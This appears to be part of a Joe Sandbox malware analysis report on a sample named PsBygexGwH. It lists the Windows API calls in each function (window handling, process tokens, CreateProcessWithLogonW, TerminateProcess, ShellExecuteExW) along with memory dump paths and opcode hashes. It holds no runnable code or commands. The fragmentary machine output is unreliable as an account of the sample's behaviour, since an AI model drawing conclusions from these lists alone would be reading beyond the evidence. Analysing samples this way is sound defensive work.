                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001B82D1
                                                          • ShowWindow.USER32(00000000,00000004), ref: 001B82E5
                                                          • EnableWindow.USER32(00000000,00000001), ref: 001B830B
                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001B832F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 7177cf7dc8edc38fbdaf00c92862c478dad43b95ca9c9f7b5f0a03ac989c6143
                                                          • Instruction ID: fd63c38b2c943bd87d0ae20526e655cefc61d09da52d715170d4dd8ab0a19b81
                                                          • Opcode Fuzzy Hash: 7177cf7dc8edc38fbdaf00c92862c478dad43b95ca9c9f7b5f0a03ac989c6143
                                                          • Instruction Fuzzy Hash: F3419434601644EFDB11DF15C899BE47BF5BB1AB14F1852A9E5084F672CB71AC81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00184C95
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00184CB2
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00184CEA
                                                          • _wcslen.LIBCMT ref: 00184D08
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00184D10
                                                          • _wcsstr.LIBVCRUNTIME ref: 00184D1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                          • String ID:
                                                          • API String ID: 72514467-0
                                                          • Opcode ID: f31c572f41458219c9b05be024488a0226906c8a1afab0dc13ac586f4b2c0eb4
                                                          • Instruction ID: be9e2633402f4d26521169cb82cedf003621669d6f8bf2ecb1b1d131ca0822ee
                                                          • Opcode Fuzzy Hash: f31c572f41458219c9b05be024488a0226906c8a1afab0dc13ac586f4b2c0eb4
                                                          • Instruction Fuzzy Hash: 31216832604201BBEB156B79EC49EBB7B9CDF59750F10813EF809CA291EF60CD418BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2
                                                          • _wcslen.LIBCMT ref: 0019587B
                                                          • CoInitialize.OLE32(00000000), ref: 00195995
                                                          • CoCreateInstance.OLE32(001BFCF8,00000000,00000001,001BFB68,?), ref: 001959AE
                                                          • CoUninitialize.OLE32 ref: 001959CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 3172280962-24824748
                                                          • Opcode ID: 2ffd0544486885246b4263c0fd4f48b0fe665e5acb9793daf76d0c1d230866ca
                                                          • Instruction ID: fc5aafa7a2a2065819fd0787e23ff6aea870ecd81b07fe6463bf0ef6dc12d0fb
                                                          • Opcode Fuzzy Hash: 2ffd0544486885246b4263c0fd4f48b0fe665e5acb9793daf76d0c1d230866ca
                                                          • Instruction Fuzzy Hash: 07D163716087119FCB04DF24D480A2ABBE2FF99314F14885DF88AAB361DB31EC45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00180FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00180FCA
                                                            • Part of subcall function 00180FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00180FD6
                                                            • Part of subcall function 00180FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00180FE5
                                                            • Part of subcall function 00180FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00180FEC
                                                            • Part of subcall function 00180FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00181002
                                                          • GetLengthSid.ADVAPI32(?,00000000,00181335), ref: 001817AE
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001817BA
                                                          • HeapAlloc.KERNEL32(00000000), ref: 001817C1
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 001817DA
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00181335), ref: 001817EE
                                                          • HeapFree.KERNEL32(00000000), ref: 001817F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: b68ac1156a9a77892ead5f999303ec134f650fc7b1ce681aafb1ee62bc6eba08
                                                          • Instruction ID: 0930f2620912d973ef496ed1cf2ea891c44d168d0e882b480c661d376ec6d1ac
                                                          • Opcode Fuzzy Hash: b68ac1156a9a77892ead5f999303ec134f650fc7b1ce681aafb1ee62bc6eba08
                                                          • Instruction Fuzzy Hash: A7117972600205FFDB14AFA8DC49BAE7BADEB45755F10411DF481A7210D736AA85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001814FF
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00181506
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00181515
                                                          • CloseHandle.KERNEL32(00000004), ref: 00181520
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0018154F
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00181563
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 09fcc5ee278b05eccc5a37cb1dd0ec1d0da163acecf436616364c5049407a8b7
                                                          • Instruction ID: 168743def08829b1859d95a23b7a38bf93698d4aaad21abebeb240c37efa6f61
                                                          • Opcode Fuzzy Hash: 09fcc5ee278b05eccc5a37cb1dd0ec1d0da163acecf436616364c5049407a8b7
                                                          • Instruction Fuzzy Hash: A4115672504209BBDF119FA8ED49FDE7BADEF48704F044124FA05A2060C3718EA1DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00143379,00142FE5), ref: 00143390
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0014339E
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001433B7
                                                          • SetLastError.KERNEL32(00000000,?,00143379,00142FE5), ref: 00143409
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 118f4598b8c50682baa2e62b9e4ee6e33a6c0d6bcc9f0760373b660351c21d3d
                                                          • Instruction ID: 551788a651cadb16bcecc34029af1f77e7eb3c861559d5c5c5163b45ec3e1f3a
                                                          • Opcode Fuzzy Hash: 118f4598b8c50682baa2e62b9e4ee6e33a6c0d6bcc9f0760373b660351c21d3d
                                                          • Instruction Fuzzy Hash: 6401F733609322BFA62D2BB5BCC5A6B2A95FB25B797200329F430892F1EF114F4255D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00155686,00163CD6,?,00000000,?,00155B6A,?,?,?,?,?,0014E6D1,?,001E8A48), ref: 00152D78
                                                          • _free.LIBCMT ref: 00152DAB
                                                          • _free.LIBCMT ref: 00152DD3
                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,0014E6D1,?,001E8A48,00000010,00124F4A,?,?,00000000,00163CD6), ref: 00152DE0
                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,0014E6D1,?,001E8A48,00000010,00124F4A,?,?,00000000,00163CD6), ref: 00152DEC
                                                          • _abort.LIBCMT ref: 00152DF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: d487ef9f0da557fa02d9ee6c202ba79e4945bd4d6096ab2aa0816d67924f9911
                                                          • Instruction ID: 9337c56ef2aa6c71cbe90a6dffc808639f8d1ec89aa52903c2c2b7d8ae59fc2b
                                                          • Opcode Fuzzy Hash: d487ef9f0da557fa02d9ee6c202ba79e4945bd4d6096ab2aa0816d67924f9911
                                                          • Instruction Fuzzy Hash: 11F0A933504900EBC21227B4AC06E5E26A56BD37A7F254519FC349F5A2DF34884D5160
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00139693
                                                            • Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396A2
                                                            • Part of subcall function 00139639: BeginPath.GDI32(?), ref: 001396B9
                                                            • Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396E2
                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001B8A4E
                                                          • LineTo.GDI32(?,00000003,00000000), ref: 001B8A62
                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001B8A70
                                                          • LineTo.GDI32(?,00000000,00000003), ref: 001B8A80
                                                          • EndPath.GDI32(?), ref: 001B8A90
                                                          • StrokePath.GDI32(?), ref: 001B8AA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: 4d303f2f4751aec18cc9795349b1738d067a59ed92d05da50c0b48798a01c9da
                                                          • Instruction ID: 34f0b5ecad312be42cb8308c27158106fb280fe46036d4587764fd6b48f19a50
                                                          • Opcode Fuzzy Hash: 4d303f2f4751aec18cc9795349b1738d067a59ed92d05da50c0b48798a01c9da
                                                          • Instruction Fuzzy Hash: 30110576400109FFEB129F94DC88EAA7F6CEB08354F008122FA199A5A1C7719D95DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00185218
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00185229
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00185230
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00185238
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0018524F
                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00185261
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 1a51070e2c25a82ba41a855245b7a47b42dce1a22db1be2e66eea00f8ae1ebba
                                                          • Instruction ID: e60f429b0de3e0620968b3d898e1f76bf182af4ead430450b27772e664266c7e
                                                          • Opcode Fuzzy Hash: 1a51070e2c25a82ba41a855245b7a47b42dce1a22db1be2e66eea00f8ae1ebba
                                                          • Instruction Fuzzy Hash: 73014F75E00718BBEB10ABA99C49E5EBFB9EB48751F044165FA04A7681DB709900CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00121BF4
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00121BFC
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00121C07
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00121C12
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00121C1A
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00121C22
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: f7fa99afa540318584738592845460d1d1720456c9720bad07fb83950a0570fe
                                                          • Instruction ID: c2d10d6c4a4bd828490e005ced6cf4def69411299a923f21bed8b30d3adad884
                                                          • Opcode Fuzzy Hash: f7fa99afa540318584738592845460d1d1720456c9720bad07fb83950a0570fe
                                                          • Instruction Fuzzy Hash: A5016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CBE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0018EB30
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0018EB46
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0018EB55
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0018EB64
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0018EB6E
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0018EB75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 22bb2606510fb3f0e0dd7ff8941899381f289decc3be9b97c9d9bf0a644475af
                                                          • Instruction ID: c1f55aa60f80b3874e1ae0c994c3b65de55420d288b98c9e50fa13e776a29963
                                                          • Opcode Fuzzy Hash: 22bb2606510fb3f0e0dd7ff8941899381f289decc3be9b97c9d9bf0a644475af
                                                          • Instruction Fuzzy Hash: 5BF03A72240158BBE7215B629C0EEEF3B7CEFCAB11F000269FA01E1591E7A05A41CAF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetClientRect.USER32(?), ref: 00177452
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00177469
                                                          • GetWindowDC.USER32(?), ref: 00177475
                                                          • GetPixel.GDI32(00000000,?,?), ref: 00177484
                                                          • ReleaseDC.USER32(?,00000000), ref: 00177496
                                                          • GetSysColor.USER32(00000005), ref: 001774B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                          • String ID:
                                                          • API String ID: 272304278-0
                                                          • Opcode ID: 55013c55806cff73275028477f73356bf5f89b29a019e48cdec02ad072d5fa5e
                                                          • Instruction ID: ce8e6a0bf750ef71392e4d87b9828430ad65bd1dceb725d0d6c5edb70ed34583
                                                          • Opcode Fuzzy Hash: 55013c55806cff73275028477f73356bf5f89b29a019e48cdec02ad072d5fa5e
                                                          • Instruction Fuzzy Hash: 40014B31500215EFDB515F64DC08FEABBB6FB04321F514264F91AA25A1CB311E91EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0018187F
                                                          • UnloadUserProfile.USERENV(?,?), ref: 0018188B
                                                          • CloseHandle.KERNEL32(?), ref: 00181894
                                                          • CloseHandle.KERNEL32(?), ref: 0018189C
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001818A5
                                                          • HeapFree.KERNEL32(00000000), ref: 001818AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 778bb83862a01098b0e121196c22afb9e62a6ff815c21d2b728c560e0ca8c767
                                                          • Instruction ID: 659058d27d524dab145342090e45db62944c081b09c0cb85a655aa2a60a4507f
                                                          • Opcode Fuzzy Hash: 778bb83862a01098b0e121196c22afb9e62a6ff815c21d2b728c560e0ca8c767
                                                          • Instruction Fuzzy Hash: 69E07576104505FBDB015FA5ED0C94ABF79FF49B22B508725F22591871CB3294A1DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0018C6EE
                                                          • _wcslen.LIBCMT ref: 0018C735
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0018C79C
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0018C7CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                          • String ID: 0
                                                          • API String ID: 1227352736-4108050209
                                                          • Opcode ID: 952c20f780d584866677a8939266e80432d147f81bf6b4866d84596e722998fe
                                                          • Instruction ID: 5e959b5e114ed4685241f509e2ce7969f96f09faf94bf2444f8b7e264d5c6e86
                                                          • Opcode Fuzzy Hash: 952c20f780d584866677a8939266e80432d147f81bf6b4866d84596e722998fe
                                                          • Instruction Fuzzy Hash: B051B1726143019BD714AF28D885B6B77E4AF59314F140A3DF995D32A0EB70DA44CFE2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 001AAEA3
                                                            • Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625
                                                          • GetProcessId.KERNEL32(00000000), ref: 001AAF38
                                                          • CloseHandle.KERNEL32(00000000), ref: 001AAF67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                          • String ID: <$@
                                                          • API String ID: 146682121-1426351568
